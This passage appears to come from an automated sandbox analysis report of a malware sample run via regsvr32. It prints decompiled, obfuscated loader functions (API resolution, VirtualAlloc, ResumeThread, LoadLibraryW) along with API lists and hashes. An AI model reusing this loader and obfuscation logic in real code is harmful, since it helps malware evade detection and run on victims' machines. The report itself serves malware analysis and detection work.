            							_push( *(_t427 + 0x18) * 0x2749);
            							_push(( *(_t376 + 0x17c) &  *(_t376 + 0xd8)) - 0x1eee);
            							_push(_t421);
            							_push( *(_t427 + 0x18) +  *((intOrPtr*)(_t427 + 0x24)) +  *(_t376 + 0xd4));
            							_push(( *(_t376 + 8) | 0x000029d1) * 0x2597);
            							_push( *((intOrPtr*)(_t427 + 0x68)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_t307 = E6D515588();
            							_t376 =  *(_t427 + 0x48);
            							_t427 = _t427 + 0x38;
            							_t333 =  *(_t427 + 0x38);
            							 *(_t427 + 0x34) = _t307;
            						}
            						_t333 = _t333 + 3;
            						 *(_t427 + 0x5c) =  *(_t427 + 0x5c) + ( *(_t427 + 0x5c) &  *(_t376 + 0xd4)) -  *((intOrPtr*)(_t376 + 0x90));
            						 *(_t427 + 0x38) = _t333;
            						 *(_t427 + 0x2c) =  *(_t427 + 0x2c) ^ ( *(_t376 + 0x148) & 0x000028a4) + 0x00002ac3;
            						 *(_t427 + 0x30) =  *(_t427 + 0x30) ^  *(_t427 + 0x1c) +  *(_t427 + 0x20) *  *(_t376 + 0x1d4);
            						 *(_t376 + 0x1d4) =  *(_t376 + 0x1d4) + ( *(_t376 + 0x158) & 0x000029d1);
            						 *(_t376 + 0x80) =  *(_t376 + 0x80) ^  *(_t427 + 0x14) * ( *(_t427 + 0x5c) -  *(_t427 + 0x30));
            						 *(_t376 + 0x80) =  *(_t376 + 0x80) -  *(_t427 + 0x34) * ( *(_t376 + 0x1c) ^  *(_t376 + 0x130));
            					} while (_t333 !=  *((intOrPtr*)(_t427 + 0x24)) -  *(_t427 + 0x1c));
            					goto L4;
            				}
            				 *((intOrPtr*)(_t427 + 0x3c)) =  *(_t427 + 0x2c) - 0xcbc;
            				 *(_t427 + 0x40) =  *(_t427 + 0x18) - 0x606;
            				 *(_t427 + 0x44) =  *(_t427 + 0x18) - 0xc38;
            				 *(_t427 + 0x48) =  *(_t427 + 0x14) + 0x2ab3;
            				 *((intOrPtr*)(_t427 + 0x4c)) =  *(_t427 + 0x34) + 0x2c90;
            				 *(_t427 + 0x50) =  *(_t427 + 0x1c);
            				 *((intOrPtr*)(_t427 + 0x54)) =  *((intOrPtr*)(_t427 + 0x28)) - 0x2c4;
            				_push( *(_t427 + 0x2c) - 0x102a);
            				_push( *(_t427 + 0x2c) - 0x977);
            				_push( *(_t427 + 0x5c) - 0x32);
            				_push( *(_t427 + 0x38) - 0x7e8);
            				_push( *(_t427 + 0x2c) - 0x3f2);
            				_push( *(_t427 + 0x18) - 0xcc0);
            				_push( *(_t427 + 0x5c) + 0x12d);
            				_push( *(_t427 + 0x2c));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_t323 = E6D5173B5();
            				_t427 = _t427 + 0x3c;
            				 *((intOrPtr*)(_t427 + 0x24)) = _t323;
            				goto L3;
            			}














            APIs
              • Part of subcall function 6D50768E: SNifCw242OCD._RSR(?,?,?,?,?,-FFFFF54B,?,?,?,?,?,?,?), ref: 6D50775D
              • Part of subcall function 6D50768E: Mqae01id._RSR(?,?,?,?,-000001B2,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5077CA
              • Part of subcall function 6D50391B: GetProcAddress.KERNEL32(?,?), ref: 6D5039B2
              • Part of subcall function 6D50391B: GetProcAddress.KERNEL32(?,?), ref: 6D503C34
              • Part of subcall function 6D50391B: VirtualAlloc.KERNEL32(00000000,?,?,00000004), ref: 6D503C97
            • SNifCw242OCD._RSR(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D51949A
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: AddressCw242Proc$AllocMqae01idVirtual
            • String ID: &$r(
            • API String ID: 1422986367-2886967036
            • Opcode ID: 827b6f0de347a1d9e78845b0b84c984fda7312979fd4f52ef06c6568f675e1b8
            • Instruction ID: 789f9c777a2ec3f8db38928147d4ba24ffb983072f7d79f474136505c6188d1c
            • Opcode Fuzzy Hash: 827b6f0de347a1d9e78845b0b84c984fda7312979fd4f52ef06c6568f675e1b8
            • Instruction Fuzzy Hash: F5F1EC726083419FE354CF68C984A5BFBE4FB88348F048A2DF5989B391D778E954CB52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 19%
            			E6D51A07D() {
            				intOrPtr _t61;
            				void* _t100;
            				signed int _t122;
            				intOrPtr _t123;
            				signed int _t124;
            				void* _t127;
            				intOrPtr _t128;
            				intOrPtr _t130;
            				intOrPtr _t131;
            				signed int _t134;
            				intOrPtr _t137;
            				intOrPtr _t140;
            				intOrPtr _t142;
            				intOrPtr _t143;
            				void* _t145;
            				void* _t147;
            
            				_t61 =  *((intOrPtr*)(_t147 + 0x48));
            				_t124 = _t61 - 0x252e;
            				_t130 =  *((intOrPtr*)(_t147 + 0x20)) + 0x2c4;
            				 *(_t147 + 0x50) = _t124;
            				_t122 = _t61 + 0x484;
            				_t140 =  *((intOrPtr*)(_t147 + 0x48)) + 0xffffe185;
            				 *((intOrPtr*)(_t147 + 0x14)) = _t130;
            				_t134 =  *((intOrPtr*)(_t147 + 0x44)) + 0xfffffc3c;
            				 *((intOrPtr*)(_t147 + 0x10)) = _t140;
            				_t145 =  *((intOrPtr*)(_t147 + 0x24)) + 0x56b;
            				 *(_t147 + 0x30) = _t134;
            				if(_t124 != _t130 + 0x616) {
            					if(_t140 > _t122 + 0x2de) {
            						_t142 =  *((intOrPtr*)(_t147 + 0x28));
            						if( *((intOrPtr*)(_t142 + 0x74)) <= ( *(_t142 + 0x168) ^  *(_t142 + 0x104) | _t122)) {
            							__imp__ActivateActCtx( *((intOrPtr*)(_t142 + 0x80)) + _t124,  *(_t142 + 0x48) &  *(_t142 + 0x130) & 0x0000ffff, _t124 & 0x00002ab3, ( *(_t142 + 0x130) -  *((intOrPtr*)(_t142 + 0xbc))) * 0x2ac3, _t145 - _t130);
            							_push(( *(_t142 + 0x4c) & _t122) + 0x2ac3);
            							_push(( *(_t142 + 0xd8) ^  *(_t142 + 0x5c)) -  *((intOrPtr*)(_t147 + 0x44)) + 0x6b3);
            							_push(_t134 ^ 0x0000252e);
            							ResumeThread( *(_t142 + 0x110) ^ 0x00001e7b);
            						}
            					} else {
            						_t143 =  *((intOrPtr*)(_t147 + 0x54));
            						_t137 =  *((intOrPtr*)(_t147 + 0x28));
            						_push(_t122 + 0x101);
            						_push(_t124 + 0x29d1);
            						_push( *((intOrPtr*)(_t147 + 0x58)) + 0x88);
            						_push(_t137);
            						_t19 = _t143 + 0x71f; // 0x6d50205b
            						_push( *((intOrPtr*)(_t147 + 0x24)) + 0x2749);
            						_push( *((intOrPtr*)(_t147 + 0x54)) + 0xfffffd25);
            						_push( *((intOrPtr*)(_t147 + 0x4c)) + 0x13c);
            						_t23 = _t143 + 0xfb7; // 0x6d5028f3
            						_push( *((intOrPtr*)(_t147 + 0x40)) + 0x345);
            						_t100 = E6D501986();
            						_t131 =  *((intOrPtr*)(_t147 + 0x38));
            						_t127 = _t100;
            						_push(_t145 - 0xc5);
            						_push(_t131 + 0x21e9);
            						_t29 = _t147 + 0x80; // 0x6d50205b
            						_t123 =  *_t29;
            						_push(_t122 - 0xbbf);
            						_push(_t123 + 0x73b);
            						_push(_t123 + 0x956);
            						_push(_t137);
            						_push(_t131 + 0x252e);
            						_t33 = _t127 - 0x606; // -1542
            						_push( *((intOrPtr*)(_t147 + 0x5c)) + 0xfffff9ce);
            						_push(_t123 + 0x7a4);
            						_t36 = _t127 + 0x1dd; // 0x1dd
            						_t128 =  *((intOrPtr*)(_t147 + 0x8c));
            						_t38 = _t143 + 0xbd5; // 0x6d502511
            						_push( *((intOrPtr*)(_t147 + 0xb0)) + 0x1df3);
            						_push(_t128 + 0x241);
            						_push(_t128 + 0x251);
            						_t42 = _t143 + 0x5bf; // 0x6d501efb
            						E6D51724F();
            						_t147 = _t147 + 0x68;
            						 *((intOrPtr*)(_t137 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x88)) + 0x1c)) + 0x1b061;
            					}
            				}
            				return  *((intOrPtr*)(_t147 + 0x4c));
            			}




















            APIs
            • ActivateActCtx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6D50193C,?,?,?,?), ref: 6D51A235
            • ResumeThread.KERNEL32(?,?,?,?), ref: 6D51A26D
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ActivateResumeThread
            • String ID: [ Pm
            • API String ID: 2475288038-2361217518
            • Opcode ID: a023ff0076ea37238bbd7245d655c8925f9e39c9c9fb96a15f9315bc7cb49a12
            • Instruction ID: f36e8007d197fab6f30abf2e97706bcf3353a6a97da4c688237e00c97e0fcadc
            • Opcode Fuzzy Hash: a023ff0076ea37238bbd7245d655c8925f9e39c9c9fb96a15f9315bc7cb49a12
            • Instruction Fuzzy Hash: 7E511872504605AFD711CB68CC85EDBB3ECFB88304F040A6AF99AD7241D735FA458B65
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E027AD31D(void* __ebx, void* __edx, void* __edi, void* __esi) {
            				char _v8;
            				char _v12;
            				char _v140;
            				signed char _t14;
            				char _t15;
            				intOrPtr _t20;
            				void* _t25;
            				intOrPtr _t26;
            				intOrPtr _t32;
            				WCHAR* _t34;
            				intOrPtr _t35;
            				struct HINSTANCE__* _t37;
            				intOrPtr _t38;
            				intOrPtr _t46;
            				void* _t47;
            				intOrPtr _t50;
            				void* _t60;
            				void* _t61;
            				char _t62;
            				void* _t65;
            				intOrPtr _t66;
            				char _t68;
            
            				_t65 = __esi;
            				_t61 = __edi;
            				_t47 = __ebx;
            				_t50 =  *0x27bf8e4; // 0x47ffc00
            				_t14 =  *(_t50 + 0x1898);
            				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
            					_t15 = E027A9F8F(_t50, 0x2e4);
            					_t66 =  *0x27bf8e4; // 0x47ffc00
            					_t62 = _t15;
            					_t67 = _t66 + 0xb0;
            					_v8 = _t62;
            					E027A9FEE( &_v140, 0x40, L"%08x", E027AE3C8(_t66 + 0xb0, E027AA5DA(_t66 + 0xb0), 0));
            					_t20 =  *0x27bf8e4; // 0x47ffc00
            					asm("sbb eax, eax");
            					_t25 = E027A9F8F(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000034) + 0xaaa);
            					_t26 =  *0x27bf8e4; // 0x47ffc00
            					_t68 = E027A9BF7(_t26 + 0x1020);
            					_v12 = _t68;
            					E027A8D41( &_v8);
            					_t32 =  *0x27bf8e4; // 0x47ffc00
            					_t34 = E027A9BF7(_t32 + 0x122a);
            					 *0x27bf9e4 = _t34;
            					_t35 =  *0x27bf8e0; // 0x47ff8c0
            					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x27bc9d8,  &_v140, ".", L"dll", 0, 0x27bc9d8, _t25, 0x27bc9d8, _t62, 0, _t61, _t65, _t47);
            					_t37 = LoadLibraryW( *0x27bf9e4);
            					 *0x27bf9dc = _t37;
            					if(_t37 == 0) {
            						_t38 = 0;
            					} else {
            						_push(_t37);
            						_t60 = 0x28;
            						_t38 = E027AF10E(0x27bcbc4, _t60);
            					}
            					 *0x27bf9e0 = _t38;
            					E027A8D86( &_v12, 0xfffffffe);
            					E027A8F0A( &_v140, 0, 0x80);
            					if( *0x27bf9e0 != 0) {
            						goto L10;
            					} else {
            						E027A8D86(0x27bf9e4, 0xfffffffe);
            						goto L8;
            					}
            				} else {
            					L8:
            					if( *0x27bf9e0 == 0) {
            						_t46 =  *0x27bf918; // 0x47ffa00
            						 *0x27bf9e0 = _t46;
            					}
            					L10:
            					return 1;
            				}
            			}


























            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID: %08x$dll
            • API String ID: 1029625771-2963171978
            • Opcode ID: 6d90a328ec1a9a8b14316e7729e942622bf11f264453f031ab56fd4cce5864aa
            • Instruction ID: 911d273b3295935d925252c9161cd268186ed5191526cc28bd918cd8b81992c8
            • Opcode Fuzzy Hash: 6d90a328ec1a9a8b14316e7729e942622bf11f264453f031ab56fd4cce5864aa
            • Instruction Fuzzy Hash: 06312EB1E40104BFE712DB58DC49F9A33EDEB89764F14C636F504D3580DB3499548B61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E027B36F2(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
            				char _v5;
            				long long _v12;
            				short _v20;
            				signed int _t15;
            				void* _t16;
            				signed int _t22;
            				char _t25;
            				void* _t26;
            				signed int _t28;
            				intOrPtr _t29;
            				void* _t31;
            				char** _t32;
            				long long _t40;
            				long long _t41;
            
            				_t40 = __fp0;
            				_t15 = E027B360B(_a4);
            				 *_t32 = "msxml32.dll";
            				_t28 = _t15 & 0x0fffffff;
            				_t16 = E027AA5DA();
            				_t26 = 0xf;
            				_t25 = 0;
            				_v5 = 0;
            				if(_t16 > _t26) {
            					L2:
            					_t3 = _t25 + 0x41; // 0x41
            					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
            					_t25 = _t25 + 1;
            				} else {
            					_t26 = _t16;
            					if(_t26 != 0) {
            						do {
            							goto L2;
            						} while (_t25 < _t26);
            					}
            				}
            				lstrlenW( &_v20);
            				_t29 = _a8;
            				_t22 = _a12 - _t29 + 1;
            				_a12 = _t22;
            				asm("fild dword [ebp+0x10]");
            				if(_t22 < 0) {
            					_t40 = _t40 +  *0x27bcf90;
            				}
            				_a12 = _t28;
            				_v12 = _t40;
            				_t41 = _v12;
            				asm("fild dword [ebp+0x10]");
            				if(_t28 < 0) {
            					_t41 = _t41 +  *0x27bcf90;
            				}
            				_v12 = _t41;
            				asm("fmulp st1, st0");
            				L027B89B5();
            				return _t29 - _t22;
            			}


















            APIs
            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 027B3739
            • _ftol2_sse.MSVCRT ref: 027B377C
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _ftol2_sselstrlen
            • String ID: msxml32.dll
            • API String ID: 1292649733-2051705522
            • Opcode ID: e847ebb7b8d001057a1402fea8c7174c5d6dfe0438827b5a188205849d5ac951
            • Instruction ID: e95bbaf71079acd5ed2dbd869946906b0eb7c78302439be98e7fa5e70e7d5bfe
            • Opcode Fuzzy Hash: e847ebb7b8d001057a1402fea8c7174c5d6dfe0438827b5a188205849d5ac951
            • Instruction Fuzzy Hash: AD112972F0028AEBCF039F68E8486DE7F75FF45310F1685D9D96482641EB30D1A08740
            Uniqueness

            Uniqueness Score: -1.00%